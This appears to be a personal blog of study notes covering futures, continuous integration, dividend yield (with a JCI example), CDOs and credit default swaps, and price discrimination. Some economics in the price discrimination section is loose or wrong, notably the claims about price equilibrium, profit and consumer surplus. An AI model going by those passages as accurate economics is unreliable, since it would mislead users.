Remember that futures trading is not limited to commodities

In securities futures, an example would be a buyer entering a contractual agreement to purchase some amount of stock for an agreed upon price at some future date. This would be to the buyer's advantage only if the price of the stock price on the future date is higher than the price agreed to in the futures contract.

At the heart of this kind of trading (and one could argue all trading) is the idea of betting for (+) or hedging against (-) the inevitable fluctuation of future value.


Reference: https://finance.zacks.com/futures-vs-commodities-5663.html

Continuous Integration

"Continuous Integration (CI) is a development practice that requires developers to integrate code into a shared repository several times a day. Each check-in is then verified by an automated build, allowing teams to detect problems early."




The idea behind CI is that every developer continuously tracks (pulls down changes from) and incrementally integrates their branch or feature code into a "master" branch, or some common branch that all other branches integrate with. Problems that stem from incompatible or "not easily merge-able" features then surface at the first detection of incompatibility, rather than at the end of feature branch development, when any incompatibilities are magnified and result in time-consuming redesign efforts to make things merge and interoperate cleanly.

In short, CI is used to nip potential integration problems in the bud.

Dividends


Dividends are a company's optional distribution of (typically) cash to stockholders and provide another way to earn money from investing beyond growing the value of one's portfolio.


A dividend is defined as "a sum of money paid regularly (typically quarterly) by a company to its shareholders out of its profits (or reserves)".

A dividend yield expresses the dividend amount relative to the company's current share price. You calculate it by dividing the total dividends paid per share over a 12-month period by the current stock price.

Some companies regularly pay out a cash dividend and can make their stock more attractive by doing so. Johnson Controls (JCI) for instance, has managed to pay a quarterly dividend every year since 1887. They paid a total dividend of $1.04 in 2018 and the stock price as of today is $31.21.




There are two ways to calculate a company's current dividend yield: (1) by using what are called "forward dividends" or (2) by using "trailing dividends". Trailing uses the preceding 12 months while forward uses the expected payouts in the following 12 months. As of today (1/2/2019) using trailing dividends, or to be more clear, in relation to their 2018 total dividend payout, JCI's dividend yield was:

$1.04 / $31.21

...or 3.3%.


As you can see from the charts above, General Electric and Honeywell have paid out cash dividends consistently for years. But GE has recently clawed back these payouts dramatically. This is probably due to GE's ongoing restructuring and spin-off efforts.

Reference:

https://www.nasdaq.com/symbol/jci/dividend-history


Collateralized Debt Obligations (CDOs)

Collateralized Debt Obligations are units of packaged debt, sometimes referred to as "Frankenstein debt" which consists of various kinds of debt obligations (auto, home, credit card, student loans, corporate debt, etc.) of various credit ratings (AAA, AA, A, BBB, BB, B, CCC, CC, etc.).

"Originally developed as instruments for the corporate debt markets, after 2002 CDOs became vehicles for refinancing mortgage-backed securities." -Wikipedia


The idea behind this type of investment is that although it contains lots of high-risk debt (that may well default), that risk is offset by the better rated debt in the CDO package.

There are also CDOs known as "CDOs squared". These are also simply packages of variously rated debt, but with an additional layer of abstraction (obfuscation). Instead of various cash-backed assets and other kinds of direct claims on debt in the bundle, CDO^2 consist of pieces or "tranches" of other CDOs.

Additionally, there are Synthetic CDOs and CDSs. A Synthetic CDO is not backed by debt assets but rather derivatives of debt assets known as "Credit Default Swaps" (CDSs), which are basically CDO insurance. The buyer of a CDS makes periodic premium payments in much the same way as premiums for home and auto insurance.

CDSs provide a way for investors to hedge CDO investments. If a credit event (default on a CDO's underlying debt asset) occurs, the buyer of a credit default swap is protected from losses. If no credit event occurs, the seller of the CDS continues to collect the premium payments for the duration of the term of the CDS.

Crazy stuff, huh? Be careful, Wall Street.. Lehman Brothers never saw it coming... 😶

2008 was obviously the wake-up call, trillions in wealth vanished as values crashed to Earth

Price Discrimination

Price Discrimination is the act of selling the same product or service at different prices to different buyers in order to match differing levels of demand. It is used to ensure business from lower demand markets and earn the maximum possible profit from higher demand markets. This can be illustrated in the case of your grandparent or child getting a discount at the movie theater because they tend to have a lower demand than the average moviegoer.

Examples of Price Discrimination

"Price Equilibrium" (PE) is the price point at which a Supply Curve and Demand Curve intersect. Any price charged above the PE will result in more profit (seller surplus) and any price below PE will result in less profit (consumer surplus, missed opportunity by seller). Pricing products and services is done through the process known as Marginal Cost Analysis.

Price discrimination can be quite problematic when it is applied on the basis of ethnicity or socioeconomic status.

Just a matter of risk data? Or a racially biased algorithm used by banks?

Although the discriminatory practice known as "redlining" has been outlawed for over 50 years, banks continue to charge higher mortgage rates to non-white consumers. From the bank's perspective they would argue that it is coincidence and simply reflects the consumer's credit and a higher risk they are taking on. Others would argue that minority loan-seekers are being priced out of the American Dream because of the color of their skin.

Gas stations tend to have higher-than-average prices in low income areas because the customers in these areas have less nearby options, are often less mobile and are in general less discriminating than shoppers in a wealthy suburb who can leverage their environment of more competition, their mobility and in turn be more selective in their consuming habits (which is to say, more likely to sharply increase or decrease demand if a price is not in equilibrium).


Now in some cases price discrimination makes perfect sense. Take for example a hardware store in Arizona and a hardware store in Wisconsin who are both selling snowblowers. The store in Arizona is almost assuredly going to sell their snowblowers for far less as the demand for snowblowers is very low in that area of the country.

But in Wisconsin, there is virtually year-round demand as it snows every year, and so the Wisconsin store is likely to charge much more than the Arizona store. Furthermore, even within Wisconsin, stores will charge less for snowblowers in the summer than in the winter (when demand is higher).

Companies differentiate prices to match demand for different types of consumers

With the exception of 4th degree price discrimination, when a price is different for different types of consumption of the same product or service- it is because demand for that product or service is different among consumers and so companies set the prices accordingly.